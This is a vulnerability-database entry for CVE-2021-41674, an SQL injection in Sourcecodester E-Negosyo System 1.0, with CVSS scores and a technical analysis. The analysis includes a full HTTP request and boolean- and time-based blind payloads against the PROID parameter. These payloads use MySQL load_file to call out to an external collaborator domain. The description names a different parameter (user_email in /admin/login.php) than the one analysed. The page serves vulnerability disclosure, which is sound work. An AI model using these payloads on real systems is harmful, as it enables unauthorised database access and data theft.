Attacker Value
Very High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
2

CVE-2021-41674

Disclosure Date: October 29, 2021
CVE-2021-41674 CVSS v3 Base Score: 9.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Validated

Description

An SQL Injection vulnerability exists in Sourcecodester E-Negosyo System 1.0 via the user_email parameter in /admin/login.php.

Add Assessment

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Easy to weaponizeGives privileged accessVulnerable in default configuration
Technical Analysis

CVE-2021-41674

Vendor

Software

Description:

The PROID parameter from E-Negosyo System 1.0 app appears to be vulnerable to SQL injection attacks in two types of injections – time-based blind and boolean-based blind.
The payload ‘+(select load_file(’\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\juc’))+’ was submitted in the PROID parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

MySQL request:

POST /bsenordering/cart/controller.php?action=add HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=n2krmhjsahctm8bpj44kms36b4
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/bsenordering/index.php?q=product
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 57

PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9e

MySQL response:

HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 06:28:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Payloads

---
Parameter: PROID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' OR NOT 5430=5430#&btnorder=%C2%9E%C3%A9e

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY&btnorder=%C2%9E%C3%A9e
---

Reproduce:

NOTE:

  • The PoC A.K.A CVE-SQL.py is encrypted for security reasons!

href

Proof:

href

Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis